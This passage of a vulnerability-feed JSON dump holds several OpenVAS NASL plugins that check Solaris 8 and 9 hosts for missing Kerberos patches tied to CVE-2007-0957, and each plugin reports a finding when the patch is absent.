["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855572", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855572", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Obsoleted by 109223-10\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Obsoleted by on solaris_5.8_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Obsoleted by\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855572\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:37:58 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109223-10\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for Obsoleted by 109223-10\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109223-10-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Obsoleted by\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", package:\"SUNWcsl SUNWgssx SUNWgss SUNWcslx SUNWcstlx SUNWcsu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:48", "description": "Check for the Version of libkadm5", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for libkadm5 112921-09", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855493", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855493", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 112921-09\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855493\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112921-09\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 112921-09\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112921-09-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of libkadm5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112921-09\", package:\"SUNWkrbu SUNWkdcu SUNWcstlx SUNWkrbux SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:43", "description": "Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1", "cvss3": {}, "published": "2009-09-23T00:00:00", "type": "openvas", "title": "Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109223-11", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855661", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109223-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kpasswd, libgss.so.1 and libkadm5clnt.so.1 on solaris_5.8_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kpasswd, libgss.so.1 and libkadm5clnt.so.1\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855661\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109223-11\");\n script_cve_id(\"CVE-2007-0957\");\n script_name(\"Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109223-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109223-11-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-11\", package:\"SUNWcstl SUNWcslx SUNWcstlx SUNWcsu SUNWgss SUNWcsl SUNWgssx\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:36", "description": "Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1", "cvss3": {}, "published": "2009-09-23T00:00:00", "type": "openvas", "title": "Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kpasswd, libgss.so.1 and libkadm5clnt.so.1 on solaris_5.8_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kpasswd, libgss.so.1 and libkadm5clnt.so.1\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855651\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109224-11\");\n script_cve_id(\"CVE-2007-0957\");\n script_name(\"Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109224-11-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"109224-11\", package:\"SUNWcstl SUNWcsu SUNWgss SUNWcsl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:38", "description": "Check for the Version of ktutil kdb5_util kadmin kadmin.local kadmind", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855025", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855025", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"ktutil kdb5_util kadmin kadmin.local kadmind on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n ktutil kdb5_util kadmin kadmin.local kadmind\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855025\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112925-08\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112925-08-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ktutil kdb5_util kadmin kadmin.local kadmind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112925-08\", package:\"SUNWkrbu SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:16", "description": "Check for the Version of krb5 usr/lib", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for krb5 usr/lib 112923-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855610", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for krb5 usr/lib 112923-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"krb5 usr/lib on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n krb5 usr/lib\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855610\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112923-04\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for krb5 usr/lib 112923-04\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112923-04-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of krb5 usr/lib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112923-04\", package:\"SUNWkrbu SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:01", "description": "Check for the Version of libkadm5", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for libkadm5 116046-09", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855603", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855603", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 116046-09\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855603\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116046-09\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 116046-09\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116046-09-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of libkadm5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116046-09\", package:\"SUNWkdcu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:08", "description": "Check for the Version of ktutil kdb5_util kadmin kadmin.local kadmind", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855025", "href": "http://plugins.openvas.org/nasl.php?oid=855025", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"ktutil kdb5_util kadmin kadmin.local kadmind on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n ktutil kdb5_util kadmin kadmin.local kadmind\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855025);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112925-08\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112925-08-1\");\n\n script_summary(\"Check for the Version of ktutil kdb5_util kadmin kadmin.local kadmind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112925-08\", package:\"SUNWkrbu SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:07", "description": "Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1", "cvss3": {}, "published": "2009-09-23T00:00:00", "type": "openvas", "title": "Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855651", "href": "http://plugins.openvas.org/nasl.php?oid=855651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kpasswd, libgss.so.1 and libkadm5clnt.so.1 on solaris_5.8_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kpasswd, libgss.so.1 and libkadm5clnt.so.1\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855651);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109224-11\");\n script_cve_id(\"CVE-2007-0957\");\n script_name(\"Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109224-11-1\");\n\n script_summary(\"Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n 